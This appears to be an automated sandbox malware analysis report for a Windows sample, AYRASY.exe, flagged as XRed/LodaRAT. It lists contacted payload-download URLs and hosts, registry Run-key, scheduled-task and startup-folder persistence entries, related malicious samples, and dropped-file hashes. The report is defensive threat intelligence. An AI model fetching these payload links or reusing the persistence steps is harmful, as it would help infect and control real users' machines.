                                                                  https://docs.google.com/Synaptics.exe, 00000003.00000002.2441515499.000000000557F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.2356852883.00000000055CC000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2441515499.000000000556D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.2356235775.00000000007AA000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2436766309.000000000072B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2436766309.00000000007B2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    https://docs.google.com/google.com/Synaptics.exe, 00000003.00000002.2441515499.0000000005618000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.2356852883.00000000055CC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      http://xred.site50.net/syn/SSLLibrary.dll6Synaptics.exe, 00000003.00000002.2438067396.0000000002190000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1:Synaptics.exe, 00000003.00000002.2438067396.0000000002190000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=1AYRASY.exefalse
                                                                            		high
                                                                            https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1~DFF3ADC856E5C0AEBE.TMP.4.drfalse
                                                                              		high
                                                                              https://docs.google.com/oogle-analytics.comSynaptics.exe, 00000003.00000002.2441515499.0000000005618000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                http://xred.site50.net/syn/SSLLibrary.dl8AYRASY.exe, 00000000.00000003.2148237469.00000000022E0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                • Avira URL Cloud: malware
                                                                                		unknown
                                                                                https://docs.google.com/uc?id=0BxsMXSynaptics.exe, 00000003.00000002.2441515499.000000000557F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dlLAYRASY.exe, 00000000.00000003.2148237469.00000000022E0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    https://docs.google.com/neerSynaptics.exe, 00000003.00000003.2356852883.00000000055CC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      		high
                                                                                      https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGSynaptics.exe, 00000003.00000003.2356852883.000000000558B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        		high
                                                                                        http://xred.site50.net/syn/SUpdate.iniZSynaptics.exe, 00000003.00000002.2438067396.0000000002190000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                          		high
                                                                                          http://xred.site50.net/syn/SUpdate.iniAYRASY.exefalse
                                                                                            		high
                                                                                            https://docs.google.com/derSynaptics.exe, 00000003.00000002.2441515499.000000000557F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              		high
                                                                                              https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dl=16Synaptics.exe, 00000003.00000002.2438067396.0000000002190000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                		high
                                                                                                http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978lAYRASY.exe, 00000000.00000003.2148237469.00000000022E0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                  		high
                                                                                                  https://docs.google.com/uc?id=0;Synaptics.exe, 00000003.00000002.2455890398.00000000083BE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2444140781.000000000617E000.00000004.00000010.00020000.00000000.sdmpfalse
                                                                                                    		high
                                                                                                    http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc6135629787Synaptics.exe, 00000003.00000002.2436766309.000000000072B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      		high
                                                                                                      http://xred.site50.net/syn/SSLLibrary.dllAYRASY.exefalse
                                                                                                        		high

                                                                                                        World Map of Contacted IPs

                                                                                                        • No. of IPs < 25%
                                                                                                        • 25% < No. of IPs < 50%
                                                                                                        • 50% < No. of IPs < 75%
                                                                                                        • 75% < No. of IPs

                                                                                                        Public IPs

                                                                                                        IPDomainCountryFlagASNASN NameMalicious
                                                                                                        142.250.186.46
                                                                                                        		docs.google.comUnited States
                                                                                                        		15169GOOGLEUSfalse
                                                                                                        172.217.23.97
                                                                                                        		drive.usercontent.google.comUnited States
                                                                                                        		15169GOOGLEUSfalse
                                                                                                        172.111.138.100
                                                                                                        		unknownUnited States
                                                                                                        		3223VOXILITYGBtrue
                                                                                                        69.42.215.252
                                                                                                        		freedns.afraid.orgUnited States
                                                                                                        		17048AWKNET-LLCUSfalse

                                                                                                        General Information

                                                                                                        Joe Sandbox version:41.0.0 Charoite
                                                                                                        Analysis ID:1582334
                                                                                                        Start date and time:2024-12-30 11:23:11 +01:00
                                                                                                        Joe Sandbox product:CloudBasic
                                                                                                        Overall analysis duration:0h 10m 14s
                                                                                                        Hypervisor based Inspection enabled:false
                                                                                                        Report type:full
                                                                                                        Cookbook file name:default.jbs
                                                                                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                        Number of analysed new started processes analysed:23
                                                                                                        Number of new started drivers analysed:0
                                                                                                        Number of existing processes analysed:0
                                                                                                        Number of existing drivers analysed:0
                                                                                                        Number of injected processes analysed:0
                                                                                                        Technologies:
                                                                                                        • HCA enabled
                                                                                                        • EGA enabled
                                                                                                        • AMSI enabled
                                                                                                        Analysis Mode:default
                                                                                                        Analysis stop reason:Timeout
                                                                                                        Sample name:AYRASY.exe
                                                                                                        Detection:MAL
                                                                                                        Classification:mal100.troj.expl.evad.winEXE@21/28@5/4
                                                                                                        EGA Information:
                                                                                                        • Successful, ratio: 100%
                                                                                                        HCA Information:
                                                                                                        • Successful, ratio: 100%
                                                                                                        • Number of executed functions: 92
                                                                                                        • Number of non-executed functions: 282
                                                                                                        Cookbook Comments:
                                                                                                        • Found application associated with file extension: .exe

                                                                                                        Warnings

                                                                                                        • Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                                                                                                        • Excluded IPs from analysis (whitelisted): 52.109.28.46, 184.28.90.27, 52.113.194.132, 20.189.173.17, 104.208.16.94, 13.107.246.45, 20.190.159.23, 20.109.210.53, 13.107.253.44
                                                                                                        • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, onedscolprdwus22.westus.cloudapp.azure.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, ecs-office.s-0005.s-msedge.net, ocsp.digicert.com, login.live.com, e16604.g.akamaiedge.net, officeclient.microsoft.com, prod.fs.microsoft.com.akadns.net, onedsblobprdcus16.centralus.cloudapp.azure.com, ecs.office.com, self-events-data.trafficmanager.net, client.wns.windows.com, fs.microsoft.com, otelrules.azureedge.net, prod.configsvc1.live.com.akadns.net, self.events.data.microsoft.com, ctldl.windowsupdate.com, s-0005-office.config.skype.com, fe3cr.delivery.mp.microsoft.com, s-0005.s-msedge.net, config.officeapps.live.com, blobcollector.events.data.trafficmanager.net, umwatson.events.data.microsoft.com, ecs.office.trafficmanager.net, europe.configsvc1.live.com.akadns.net, uks-azsc-config.officeapps.live.com
                                                                                                        • Not all processes where analyzed, report is missing behavior information
                                                                                                        • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                        • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                        • Report size getting too big, too many NtCreateKey calls found.
                                                                                                        • Report size getting too big, too many NtEnumerateKey calls found.
                                                                                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                        • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                        • Report size getting too big, too many NtReadFile calls found.
                                                                                                        • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                                                        • Report size getting too big, too many NtSetInformationFile calls found.

                                                                                                        Simulations

                                                                                                        Behavior and APIs

                                                                                                        TimeTypeDescription
                                                                                                        05:24:21API Interceptor75x Sleep call for process: Synaptics.exe modified
                                                                                                        05:24:34API Interceptor1x Sleep call for process: WerFault.exe modified
                                                                                                        11:24:09AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run WBHUSK "C:\Users\user\AppData\Roaming\Windata\YOABSG.exe"
                                                                                                        11:24:10Task SchedulerRun new task: WBHUSK.exe path: C:\Users\user\AppData\Roaming\Windata\YOABSG.exe
                                                                                                        11:24:18AutostartRun: HKLM\Software\Microsoft\Windows\CurrentVersion\Run Synaptics Pointing Device Driver C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                        11:24:26AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run WBHUSK "C:\Users\user\AppData\Roaming\Windata\YOABSG.exe"
                                                                                                        11:24:34AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\WBHUSK.lnk

                                                                                                        Joe Sandbox View / Context

                                                                                                        IPs

                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                        172.111.138.100mmi8nLybam.exeGet hashmaliciousLodaRATBrowse
                                                                                                          Supplier 0202AW-PER2 Sheet.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                            Purchase Order No. G02873362-Docx.vbsGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                              New PO - Supplier 0202AW-PER2.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                RNEQTT.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                  Bank Information Details.batGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                    Purchase Order Supplies.Pdf.exeGet hashmaliciousLodaRATBrowse
                                                                                                                      bf-p2b.exeGet hashmaliciousLodaRATBrowse
                                                                                                                        gry.exeGet hashmaliciousUnknownBrowse
                                                                                                                          dlawt.exeGet hashmaliciousLodaRatBrowse
                                                                                                                            69.42.215.252Supplier 0202AW-PER2 Sheet.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                            • freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
                                                                                                                            zhuzhu.exeGet hashmaliciousGhostRat, XRedBrowse
                                                                                                                            • freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
                                                                                                                            Purchase Order No. G02873362-Docx.vbsGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                            • freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
                                                                                                                            blq.exeGet hashmaliciousGh0stCringe, RunningRAT, XRedBrowse
                                                                                                                            • freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
                                                                                                                            New PO - Supplier 0202AW-PER2.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                            • freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
                                                                                                                            RNEQTT.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                            • freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
                                                                                                                            ZmrwoZsbPp.exeGet hashmaliciousXRedBrowse
                                                                                                                            • freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
                                                                                                                            ccmsetup.exeGet hashmaliciousXRedBrowse
                                                                                                                            • freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
                                                                                                                            Synaptics.exeGet hashmaliciousXRedBrowse
                                                                                                                            • freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
                                                                                                                            RezQY7jWu8.exeGet hashmaliciousXRedBrowse
                                                                                                                            • freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978

                                                                                                                            Domains

                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                            freedns.afraid.orgSupplier 0202AW-PER2 Sheet.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                            • 69.42.215.252
                                                                                                                            zhuzhu.exeGet hashmaliciousGhostRat, XRedBrowse
                                                                                                                            • 69.42.215.252
                                                                                                                            Purchase Order No. G02873362-Docx.vbsGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                            • 69.42.215.252
                                                                                                                            blq.exeGet hashmaliciousGh0stCringe, RunningRAT, XRedBrowse
                                                                                                                            • 69.42.215.252
                                                                                                                            New PO - Supplier 0202AW-PER2.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                            • 69.42.215.252
                                                                                                                            RNEQTT.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                            • 69.42.215.252
                                                                                                                            ZmrwoZsbPp.exeGet hashmaliciousXRedBrowse
                                                                                                                            • 69.42.215.252
                                                                                                                            ccmsetup.exeGet hashmaliciousXRedBrowse
                                                                                                                            • 69.42.215.252
                                                                                                                            Synaptics.exeGet hashmaliciousXRedBrowse
                                                                                                                            • 69.42.215.252
                                                                                                                            RezQY7jWu8.exeGet hashmaliciousXRedBrowse
                                                                                                                            • 69.42.215.252

                                                                                                                            ASNs

                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                            VOXILITYGBmmi8nLybam.exeGet hashmaliciousLodaRATBrowse
                                                                                                                            • 172.111.138.100
                                                                                                                            Supplier 0202AW-PER2 Sheet.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                            • 172.111.138.100
                                                                                                                            loligang.mips.elfGet hashmaliciousMiraiBrowse
                                                                                                                            • 104.250.189.221
                                                                                                                            Purchase Order No. G02873362-Docx.vbsGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                            • 172.111.138.100
                                                                                                                            New PO - Supplier 0202AW-PER2.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                            • 172.111.138.100
                                                                                                                            RNEQTT.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                            • 172.111.138.100
                                                                                                                            1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                                                                            • 104.243.246.120
                                                                                                                            nabsh4.elfGet hashmaliciousUnknownBrowse
                                                                                                                            • 46.243.206.70
                                                                                                                            7jBzTH9FXQ.exeGet hashmaliciousUnknownBrowse
                                                                                                                            • 37.221.166.158
                                                                                                                            fACYdCvub8.exeGet hashmaliciousUnknownBrowse
                                                                                                                            • 5.254.60.108
                                                                                                                            AWKNET-LLCUS222.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                            • 69.42.215.252
                                                                                                                            Supplier 0202AW-PER2 Sheet.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                            • 69.42.215.252
                                                                                                                            zhuzhu.exeGet hashmaliciousGhostRat, XRedBrowse
                                                                                                                            • 69.42.215.252
                                                                                                                            Purchase Order No. G02873362-Docx.vbsGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                            • 69.42.215.252
                                                                                                                            blq.exeGet hashmaliciousGh0stCringe, RunningRAT, XRedBrowse
                                                                                                                            • 69.42.215.252
                                                                                                                            New PO - Supplier 0202AW-PER2.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                            • 69.42.215.252
                                                                                                                            RNEQTT.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                            • 69.42.215.252
                                                                                                                            ZmrwoZsbPp.exeGet hashmaliciousXRedBrowse
                                                                                                                            • 69.42.215.252
                                                                                                                            ccmsetup.exeGet hashmaliciousXRedBrowse
                                                                                                                            • 69.42.215.252
                                                                                                                            Synaptics.exeGet hashmaliciousXRedBrowse
                                                                                                                            • 69.42.215.252

                                                                                                                            JA3 Fingerprints

                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                            37f463bf4616ecd445d4a1937da06e19222.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                            • 142.250.186.46
                                                                                                                            • 172.217.23.97
                                                                                                                            Supplier 0202AW-PER2 Sheet.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                            • 142.250.186.46
                                                                                                                            • 172.217.23.97
                                                                                                                            zhuzhu.exeGet hashmaliciousGhostRat, XRedBrowse
                                                                                                                            • 142.250.186.46
                                                                                                                            • 172.217.23.97
                                                                                                                            setup.msiGet hashmaliciousUnknownBrowse
                                                                                                                            • 142.250.186.46
                                                                                                                            • 172.217.23.97
                                                                                                                            Lets-x64.exeGet hashmaliciousNitol, ZegostBrowse
                                                                                                                            • 142.250.186.46
                                                                                                                            • 172.217.23.97
                                                                                                                            KL-3.1.16.exeGet hashmaliciousNitol, ZegostBrowse
                                                                                                                            • 142.250.186.46
                                                                                                                            • 172.217.23.97
                                                                                                                            Whyet-4.9.exeGet hashmaliciousNitol, ZegostBrowse
                                                                                                                            • 142.250.186.46
                                                                                                                            • 172.217.23.97
                                                                                                                            QQyisSetups64.exeGet hashmaliciousGhostRatBrowse
                                                                                                                            • 142.250.186.46
                                                                                                                            • 172.217.23.97
                                                                                                                            wyySetups64.exeGet hashmaliciousGhostRatBrowse
                                                                                                                            • 142.250.186.46
                                                                                                                            • 172.217.23.97

                                                                                                                            Dropped Files

                                                                                                                            No context

                                                                                                                            Created / dropped Files

                                                                                                                            C:\Program Files (x86)\Microsoft Office\root\vfs\Common AppData\Microsoft\OFFICE\Heartbeat\HeartbeatCache.xml

                                                                                                                            Download File
                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                                            File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):118
                                                                                                                            Entropy (8bit):3.5700810731231707
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:3:QaklTlAlXMLLmHlIlFLlmIK/5lTn84vlJlhlXlDHlA6l3l6Als:QFulcLk04/5p8GVz6QRq
                                                                                                                            MD5:573220372DA4ED487441611079B623CD
                                                                                                                            SHA1:8F9D967AC6EF34640F1F0845214FBC6994C0CB80
                                                                                                                            SHA-256:BE84B842025E4241BFE0C9F7B8F86A322E4396D893EF87EA1E29C74F47B6A22D
                                                                                                                            SHA-512:F19FA3583668C3AF92A9CEF7010BD6ECEC7285F9C8665F2E9528DBA606F105D9AF9B1DB0CF6E7F77EF2E395943DC0D5CB37149E773319078688979E4024F9DD7
                                                                                                                            Malicious:false
                                                                                                                            Reputation:high, very likely benign file
                                                                                                                            Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.H.e.a.r.t.b.e.a.t.C.a.c.h.e./.>.

                                                                                                                            C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_Synaptics.exe_6006a5d9523bc6e9daf98fd59a42cdc1f3fde8b_455b7b6e_d3d18fab-5b89-4e6f-986b-da59d36e17e2\Report.wer

                                                                                                                            Download File
                                                                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                            File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):65536
                                                                                                                            Entropy (8bit):1.1336775162267894
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:192:WfOVpsosImm0BU/3DzJDzqjLOA/FccBFzuiFdZ24IO8EKDzy:lyL3BU/3JqjkizuiFdY4IO8zy
                                                                                                                            MD5:5C0CD3144A182CD984EAF3D74EB574DC
                                                                                                                            SHA1:55AA57E6DEA3EF488D286F05966AFEB29EEE833A
                                                                                                                            SHA-256:F4CF5F98DA33292B7886F5FECE5763BE5BBEC3A3C8D094D14C8338F9BDB3E4EC
                                                                                                                            SHA-512:F72BC283499C9F02E5B11B4FB3E9159E144E3554F4C35E64A4836905217C44D1FDFD598A669E901897D060C0A41C8416A6F0673EC1BDEB90626F14A5EED01287
                                                                                                                            Malicious:false
                                                                                                                            Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.8.0.0.2.7.8.6.9.0.4.6.9.2.1.1.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.8.0.0.2.7.8.7.2.3.5.9.4.2.1.5.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.d.3.d.1.8.f.a.b.-.5.b.8.9.-.4.e.6.f.-.9.8.6.b.-.d.a.5.9.d.3.6.e.1.7.e.2.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.0.2.b.1.7.5.b.c.-.8.2.c.c.-.4.3.f.c.-.8.b.6.c.-.6.0.e.e.f.8.c.8.4.8.2.e.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.S.y.n.a.p.t.i.c.s...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.3.b.8.-.0.0.0.1.-.0.0.1.5.-.5.1.9.7.-.7.1.f.4.a.4.5.a.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.b.9.9.a.1.3.7.d.5.9.3.d.d.a.9.d.1.5.8.d.c.8.b.6.b.7.7.2.0.d.e.b.0.0.0.0.1.f.0.4.!.0.0.0.0.3.c.f.4.8.6.0.8.e.3.c.7.3.1.1.5.e.3.7.3.1.6.a.4.9.f.4.7.d.3.5.8.6.c.5.c.9.4.e.1.!.S.y.n.a.p.t.i.c.s...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.

                                                                                                                            C:\ProgramData\Microsoft\Windows\WER\Temp\WER9F05.tmp.dmp

                                                                                                                            Download File
                                                                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                            File Type:Mini DuMP crash report, 15 streams, Mon Dec 30 10:24:31 2024, 0x1205a4 type
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):748452
                                                                                                                            Entropy (8bit):2.261017320918558
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:3072:mp0runcr4taeXXLA9UxNB4eMp5mrps8oHbINT:muinaiXbaSqeMp5mrps8o72
                                                                                                                            MD5:39D1ACD502E1D52CCCC92BA805A45DDE
                                                                                                                            SHA1:30C72334AC7E3C01DD3D67143B93BFEA08F4618E
                                                                                                                            SHA-256:E6D80F9C9DA75CD28FDC2974AE9D579479477183E98116ACAFC21ECB6E4E11FF
                                                                                                                            SHA-512:EFCAF39B248A2EA4FEBE660F21B45BB92BB404A13476BEBC9A5B4A50CD01BFD34E8D40667EFAD81B5774BC27A27FF30B578E7B6413813E6BD9D09D3276940A26
                                                                                                                            Malicious:false
                                                                                                                            Preview:MDMP..a..... ........trg....................................$....6.......).../..........`.......8...........T...........h...<............6...........8..............................................................................eJ......(9......GenuineIntel............T............trg.............................0..2...........,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                            C:\ProgramData\Microsoft\Windows\WER\Temp\WERAA6F.tmp.WERInternalMetadata.xml

                                                                                                                            Download File
                                                                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                            File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):6316
                                                                                                                            Entropy (8bit):3.716206454733045
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:192:R6l7wVeJsx96ZVv0UYiSEYprs89bYSsfgom:R6lXJa6ZVfYsMYRfW
                                                                                                                            MD5:317D5E22CAB679ACCBE1EDF39A21E7CE
                                                                                                                            SHA1:777BC24EEAF1899168DF2682BE24803648493291
                                                                                                                            SHA-256:82F7B078EF10BD063038135B744FA6D09363AFA4F23D1C91026E302D1541091E
                                                                                                                            SHA-512:A2C3A5F7769A842AD11182AD7CD75BC4238D81AB79B4FB1E4352EA75A02E60A4CE1EF110A9C76CEDDA13E440BB795499B20251F1CD13DCFD2FBE6E7E4AFC6570
                                                                                                                            Malicious:false
                                                                                                                            Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.5.0.4.8.<./.P.i.

                                                                                                                            C:\ProgramData\Microsoft\Windows\WER\Temp\WERAAAF.tmp.xml

                                                                                                                            Download File
                                                                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                            File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):4572
                                                                                                                            Entropy (8bit):4.448488005078407
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:48:cvIwWl8zs4qJg77aI9VaWpW8VYIYm8M4JFAF0V+q84vBdZld:uIjfvI77b7VIJRVZBdZld
                                                                                                                            MD5:B33525AE24187F4717BBE8579FC02631
                                                                                                                            SHA1:56E14A689B0CB32F18F27CC8F70CB65586E1C8D2
                                                                                                                            SHA-256:AB062D2F3CF3969B476D42DAFBD08C28304ACE423AEEA1E48A915294A5536B92
                                                                                                                            SHA-512:25574FB211B14B1FCB0F6B6239ACB56671D7940B0CDB3ECC0C1B695845301608F50506B1D95CBC0C29E106BAE5353E91DBFD5D1DE620153160878B1DC3ACD10D
                                                                                                                            Malicious:false
                                                                                                                            Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="653847" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                                                                                                            C:\ProgramData\Synaptics\RCX4413.tmp

                                                                                                                            Download File
                                                                                                                            Process:C:\Users\user\Desktop\AYRASY.exe
                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                            Category:modified
                                                                                                                            Size (bytes):771584
                                                                                                                            Entropy (8bit):6.639994041359131
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:12288:aMSApJVYG5lDLyjsb0eOzkv4R7QnvUUilQ35+6G75V9Igr:ansJ39LyjbJkQFMhmC+6GD9j
                                                                                                                            MD5:27C056CC4DAFB6B3161272E800C85E55
                                                                                                                            SHA1:3CF48608E3C73115E37316A49F47D3586C5C94E1
